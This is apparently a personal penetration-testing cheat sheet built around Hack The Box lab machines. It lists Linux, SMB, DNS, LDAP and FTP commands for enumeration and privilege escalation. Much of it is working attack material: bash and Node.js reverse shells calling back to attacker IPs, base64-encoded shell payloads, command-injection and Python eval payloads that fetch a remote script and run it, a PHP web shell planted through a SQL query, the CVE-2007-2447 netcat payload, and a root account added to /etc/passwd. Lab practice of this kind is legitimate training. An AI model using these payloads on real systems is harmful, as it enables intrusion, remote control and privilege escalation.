Linux OS command

>sudo -l -l

To list allowed sudo commands -> GTFOBins. Misconfiguration of sudoers often leads to PrivEsc.

userA@machine:/$ sudo -l -l
...
Sudoers entry:
    RunAsUsers: user_admin
    RunAsGroups: user_admin
    Commands:
        sudoedit /test.json
...
userA@machine:/$ sudo -u user_admin sudoedit /test.json

When sudoers entry shows the cmd that can be executed with root privilege by the other account, you have to use “sudo -u” to let the specific user to run the sudoers entry command

>find / -type f -user root -perm -4000 -ls 2>/dev/null
>find / -type f -user root -perm -2000 -ls 2>/dev/null
>find / -type f -user root -perm -1000 -ls 2>/dev/null

Search for SETUID/SETGID/Other bit file for PrivEsc. -f only return file

>for i in `seq 1 10`; do echo $i; done

Print 1 to 10

>for i in {0..100}; do echo $i; done

Print 1 to 100

>for i in {0..100}; do echo -n "$i: "; curl -s http://enterprise.htb/wp-content/plugins/lcars/lcars_dbpost.php?query=$i; done

Print 1 to 100 to $i then pose a HTTP request by curl. echo -n 改行をしない, curl -s is silent mode

>wget -r http://bankknab.htb/directory/

Download all files under that URL

>for line in `cat awk_users.txt`; do echo $line; done

Print every line of the file awk_users.txt

>cut -d ',' -f1

split the string by ‘,’ then print the value of the first column

>sed 's/\\r\\n\\r\\n/\n/g'

Replace the \r\n\r\n to \n

>grep -v [string]

inverse match

>grep -r 9999 .

Search 9999 recursively in the current location and sub dir. “.” indicates the current directory

>find / -group kyle 2>/dev/null | grep -v -e '^/proc' -e '^/run' -e '^/sys'

Find file group equal to kyle, and exclude the /sys, /run and /proc

>pstree

show running processes as a tree

>netstat -tnlp

Print the port opening

>cat file | gzip | base64
>echo "base64 str" | base64 -d | gzip -d > output_bin

Compress + base64 the binary file
Base64 decode + decompress to get the original bin file

>echo "" | nc -nvw2 [targetIP] 20-80

Port scan by netcat

>nc -nvlp 8080 < file

Put file to the 8080 port

>nc -nv [TargetIP] 8080 > output_file

Download file from Target IP 8080 port

>cat elf | base64 -w0
>echo "...base64..."| base64 -d > elf

Base64 the ELF file and copy/paste from victim’s PC to attacker’s PC

>curl -s -k [URL]

-s is hide the unnecessary output, -k is skip the SSL error message

>curl -s -G 'http://10.10.10.151/blog/' --data-urlencode 'lang=\\10.10.16.6\\HTB_Sniper\\test.txt' | sed -n '/<\/html>/,/<\/body>/p'

–data-urlencode and -G means the string “lang=\\10.10.16.6\\HTB_Sniper\\test.txt” will be URL encoded when request

>curl -H "User-agent: header" -v http://domain.com

-H means header, -v means display the request

>searchsploit vsftpd 2.3.4
vsftpd 2.3.4 - Backdoor Command Execution                                          | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                             | unix/remote/17491.rb
---------------------------------
Shellcodes: No Results

Quick search for a exploit in Kali by a simple keyword

>cat linpeas_output.txt | less -R

Keep the color when less the output of LinPEAS

Serve ELF by socat

>socat TCP4-LISTEN:9999,reuseaddr,fork EXEC:/home/elf

Run elf executable on 0.0.0.0:9999 for remote exploitation

Reverse Shell

Online reverse shell generator revshells
HTML Encoding reference and quick table

>echo 'cmd /c "\\10.10.14.6\share\nc64.exe -e cmd 10.10.14.6 443"' | iconv -f ascii -t utf-16le | base64 -w0

Create a base64 encoded reverse shell payload. iconv means change the encoding of the string, base64 -w0 means no newline.

>bash -i >& /dev/tcp/10.10.14.4/443 0>&1

Create a reverse shell back to 10.10.14.4 port 443

>bash -c "/bin/bash -i >& /dev/tcp/10.10.14.4/443 0>&1"
>echo "bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/443 0>&1'" | base64
YmFzaCAtYyAnL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvNDQzIDA+JjEnCg==

>echo "YmFzaCAtYyAnL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvNDQzIDA+JjEnCg==" | base64 -d | bash

Create a reverse shell back to 10.10.14.4 port 443

>......'username=;`echo+"[base64 payload]"+|+base64+-d+|+sh`'

Do not forget to decode and run the payload…(| base64 -d | sh)

>vi xxx.sh
#!/bin/bash
sh -i >& /dev/tcp/10.10.16.4/8888 0>&1
wq!
>chmod +x xxx.sh

Create a reverse shell and give it a execute permission

>curl -v http://bad.php --data-urlencode 'cmd=bash -c "/bin/bash -i >& /dev/tcp/10.10.14.7/443 0>&1"'

TCP reverse shell pair with “<?php system($_REQUEST[“cmd”]); ?>”. Note this curl request will be POST

>cat reverse_shell
#!/bin/bash
sh -i >& /dev/tcp/10.10.16.4/8888 0>&1
>python3 -m http.server 80

>nc -lvnp 8888

>"')(__import__('os').system('curl http://10.10.16.4/reverse_shell|bash'))#"

1. Host a reverse_shell by “python3 -m server.http 80”
2. Listen to port 8888 by nc
3. Send the payload to exploit the vulnerability – python’s eval here
   Download & execute reverse_shell from 1 by 3’s curl
   → reverse_shell connect to 8888 port
   → 2 get the shell

payload = mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago

Payload used in CVE-2007-2447. 1 means stdin, 2 means stderr. mkfifo for the IPC (Interprocess Communication)

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"

Build a reverse shell by phpmyadmin. The query will write “backdoor.php” to the path “C:\\xampp\\htdocs\\”, Attacker can execute the remote shell via http://[IP]/backdoor.php.
if the query SHOW VARIABLES LIKE “secure_file_priv” returns nothing, that means the backdoor.php can be saved to any location you want.

>python -c 'import pty;pty.spawn("bash")'
>^Z
zsh: suspended  nc -lvnp 443
>stty raw -echo; fg
[1]  + continued  nc -lvnp 443

>script /dev/null -c bash
>^Z
zsh: suspended  nc -lnvp 443
>stty raw -echo; fg
[1]  + continued  nc -lnvp 443

Upgrade the shell to have the auto-complete, display STDERR, up arrow history etc…

(function(){ 
    var net = require("net"), 
        cp = require("child_process"), 
        sh = cp.spawn("sh", []); 
    var client = new net.Socket(); 
    client.connect(9000, "10.10.16.6", function(){ 
        client.pipe(sh.stdin); 
        sh.stdout.pipe(client); 
        sh.stderr.pipe(client); 
    }); 
    return /a/; 
})();

JavaScript reverse shell

const fs = require(‘fs’);
fs.readFile(‘/root/root.txt’, ‘utf8’, (err, data) => {
    if (err) throw err;
    console.log(data);
});

JavaScript Code snippet to read the file on victim machine

SSH connection

>ssh user@[IP] -p [port]

Access to the port other than 22 by SSH

>chmod 600 ~/keys/id_rsa
>ssh -i [id_rsa(private key)] user@[IP]

SSH by keypair

>scp -i id_rsa [ID]@[IP]:[/path/to/file] .

Copy file from server to local dir by SSH

>ssh-keygen -l -f [privatekey]

Examine the comments in the private key

>ssh-keygen -p -f [privatekey]

Change the password of the private key

SSH Port Forwarding – Tunnel

>ssh -L 25:127.0.0.1:25 [ID]@[Target IP]
>swaks -t root@domain.com -f test@example.com --h-Subject test-mail --server 127.0.0.1

Sometimes the port only open to the localhost, so we need to build a tunnel by SSH port forwarding to those ports. The cmd above creates the tunnel from TCP port 25 on attackers machine into TCP port 25 on victim’s machine. The second cmd sends the email via tunnel so server argement points to 127.0.0.1

>ssh -L 3000:127.0.0.1:3000 [ID]@[Target IP]
Then use the browser to access 127.0.0.1:3000

Another use case is the Gitea running on the victim’s localhost. Setup the port forwarding and access the GUI by attacker’s browser.
Also, Remote-Debugger-Port could be attacked by port forwarding. Details here

Port Forwarding – chisel

# Drop chisel to the remote machine
# In local machine
python3 -m http.server

# In remote machine
>wget http://<local-ip>:8000/chisel
>chmod +x chisel

# In local machine
>./chisel server -p 8000 --reverse
# In remote machine
./chisel client 10.10.16.2:8000 R:8001:127.0.0.1:8001

Then use the browser to access 127.0.0.1:8001

It is useful when we want to access to the host & the port that cannot be directly accessible from local machine. Details

Exploit /etc/passwd

>openssl passwd -1 [password]
$1$5Y0rsBri$UBTLeVNheII/4dkXWeaHv/
>echo '[username]:$1$5Y0rsBri$UBTLeVNheII/4dkXWeaHv/:0:0:pwned:/root:/bin/bash'
>su - [username]
Password:
#whoami
root

Manually edit the passwd file to PrivEsc

>su [user]

Switch to the user that you found the PW during reconnaissance

DNS tools

DNS recon in hacktricks

>dig @[DNS server IP] domain.name
>dig @[DNS server IP] FQDN
>dig axfr @[DNS server IP] domain.name

Fetch DNS record on UDP/TCP 53. axfr is zone transfer

>dnsrecon -r 127.0.0.0/24 -n 10.10.30.10 
>dnsrecon -r 10.10.30.0/24 -n 10.10.30.10 

DNS reverse of all of the addresses(127.0.0.0 nd 10.10.30.0)

>nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" [IP]

Perform enumeration actions. It will give you different result of the normal nmap scan

>dnsenum -dnsserver 10.10.10.248 -f /usr/share/seclists/Discovery

Brute-force the DNS subdomain

>python3 DNSUpdate.py -DNS 10.10.10.24 -u '[Domain]\[User]' -p '[PW]' -a ad -r web-test -d 10.10.16.4

DNSUpdate.py can add the DNS record to the remote DNS server. -a ad means add record. -r means record. -d means DNS data, usually set it to attacker’s IP address

>python3 dnstool.py -u '[Domain]\[User]' -p '[PW]' --action add --type A --record 'web-NL' --data '10.10.16.40' [DNS Server IP]

Dnstool.py can add the DNS record to the remote DNS server. Basically the same with DNSUpdate.py

SMB tools

>smbpasswd -r [IP] -U [Username]

Reset the SMB password

>smbclient -N -L 10.10.10.16

Connect to SMB/CIFS resources on TCP 445. -N is don’t ask for password, -L is list all available shares on a host

>smbclient '\\[IP Address]\[share]' --user=[user] --password=[PW]

Login to the sharefolder

>smbclient '\\10.10.10.178\F$' --user=[ID] --password=[PW]
>smb: \IT\RU\> recurse on
>smb: \IT\RU\> prompt off
>smb: \IT\RU\> mget *

Use smbclient to download the files recursively

>smbclient '\\10.10.10.178\F$' --user=[ID] --password=[PW]
>smb: \IT\RU\> allinfo "file.txt"
altname: file~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Wed Jul 21 02:47:12 PM 2021 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
>smb: \IT\RU\> get "file.txt:Password"

Display file’s meta-data and its alternative stream, then use the “get” command to download the alternative stream

>smbmap -H 10.10.10.161 -u null

Enumerate SMB shares on TCP 445

>smbmap -H 10.10.10.178 -u [User] -p [PW] -R 'Data'

Enumerate SMB folder “Data” recursively

>rpcclient -U "" -N 10.10.10.161
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> enumdomains
rpcclient $> enumprinters
rpcclient $> querygroup [group rid]
rpcclient $> querygroupmem [group rid]
rpcclient $> queryuser [user rid]
rpcclient $> querydispinfo

Connect to TCP 445 by RPC(Remote Procedure Call) protocol. -U is username, -N is don’t ask for a password
querydispinfo will list the users with description

>rpcclient -U [ID] //10.10.10.161
rpcclient $> setuserinfo2 [ID] 23 'New Password'

Connect to TCP 445 by RPC with User/Password, then change the other account’s password. Here is the details.

>telnet 10.10.10.34 25  #Connect to SMTP server
>RCPT TO: <test@reel.com>   #Check if the user test in the mail server or not
250 OK    #The user exist
>RCPT TO: <NL@reel.com>
550 Unknown user

Connect to SMTP server and check the user existed or not

>sendEmail -f NL@NL.com -t TO@domain.com -u "Subject" -m "Content" -a attachment.txt -s 10.10.10.55 -v

Send a email by a Kali tool. -f means FROM, -t means TO, -u means SUBJECT, -m means MAIL CONTENT, -a means attachment, -s means the SMTP server’s IP address you want to send, -v means VERBOSITY.

FTP

>wget -m ftp://anonymous:anonymous@10.10.10.98

Download all file by anonymous login

>ftp [IP]
>anonymous
>anonymous
>ls -a # List all files (even hidden) (yes, they could be hidden)

anonymous login

LDAP

>ldapsearch -h [IP] -x -s base namingcontexts
>ldapsearch -H ldap://[IP] -x -s base namingcontexts

Search LDAP’s attribute namingcontexts

>ldapsearch -h [IP] -b "DC=[Domain],DC=local" -D '[ID]@[Domain]' -w '[PW]'

Search LDAP with Creds

XXD

>hexdump -e '16/1 "%02x " "\n"' file.bin

Dump to hex without address

PHP local shell

>php which
>php -a
php>phpinfo();
php>dl(phpextension.so)